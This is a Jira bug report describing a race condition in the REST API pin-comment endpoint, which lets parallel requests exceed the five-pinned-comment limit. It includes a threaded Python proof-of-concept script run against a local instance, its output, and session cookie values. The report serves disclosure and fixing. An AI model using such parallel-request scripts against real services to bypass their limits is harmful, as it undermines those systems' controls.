Uploaded image for project: 'Jira Data Center'
  1. Jira Data Center
  2. JRASERVER-79053

Race Condition allows sending multiple parallel requests at the same time to bypass the limit of business logic

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Unresolved
    • Icon: Low Low
    • None
    • 9.7.0, 10.3.7, 10.7.3, 11.0.0
    • REST API
    • None

      Issue Summary

      Race Condition in some features allows sending multiple parallel requests at the same time to bypass the limit of business logic

      Steps to Reproduce

      Race Condition in some features allows sending multiple parallel requests at the same time to bypass the limit of business logic.

      • Affected feature
        • Issue -> Pin comment:
        • Endpoint: PUT http://[jira-url]/rest/api/2/issue/<issueId>/comment/<commentID>/pin
        • Description: Jira limit only 5 comments to be pinned in a sprint. But by exploiting the Race Condition, a user can pin more than 5.
        • * Use a script or application testing tool like "Burp Suit Repeater" to simulate parallel requests with REST API calls to pin comments.
      • Endpoint: PUT http://[jira-url]/rest/api/2/issue/<issueId>/comment/<commentID>/pin
      • Below python Script was used to test locally: 
        base_url = "http://localhost:1073/rest/api/2/issue/10901/comment/"
comment_ids = ["10402", "10403", "10404", "10405", "10406", "10407", "10408", "10409"]  # Replace with actual IDs
additional_path = "/pin"

headers = {
    "Content-Type": "application/json",
    "Cookie": "JSESSIONID=B1B70276EBFEB95A184738E5EF286CB5; atlassian.xsrf.token=B7I1-V97B-LRN9-WV6B_07341dfb6fb36475553896cf45db99c8446d0a34_lin"
}

payload = 'true'

def send_request(comment_id):
    url = f"{base_url}{comment_id}{additional_path}"
    print(url)
    response = requests.put(url, headers=headers, data=payload)
    print(f"Comment ID: {comment_id}, Status Code: {response.status_code}")

threads = []
for comment_id in comment_ids:
    thread = threading.Thread(target=send_request, args=(comment_id,))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

         % python3 comment.py
http://localhost:1073/rest/api/2/issue/10901/comment/10402/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10403/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10404/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10405/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10406/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10407/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10408/pin
http://localhost:1073/rest/api/2/issue/10901/comment/10409/pin
Comment ID: 10406, Status Code: 200
Comment ID: 10403, Status Code: 200
Comment ID: 10402, Status Code: 200
Comment ID: 10407, Status Code: 200
Comment ID: 10409, Status Code: 409
Comment ID: 10408, Status Code: 200
Comment ID: 10405, Status Code: 200
Comment ID: 10404, Status Code: 200

      Expected Results

      Jira only pins 5 comments as that's the limit.

      Actual Results

      Jira allows to pin more than 5 comments.

        • Jira v10.7.3
        • Jira v10.3.7 (customer version)
        • Jira v11.0.0 (latest version)
        • Jira v9700 (the pin comment feature first implemented)

      Workaround

      Currently there is no known workaround for this behavior. A workaround will be added here when available

              Unassigned Unassigned
              cf063312d081 Binoy Nicholas
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

                Created:
                Updated: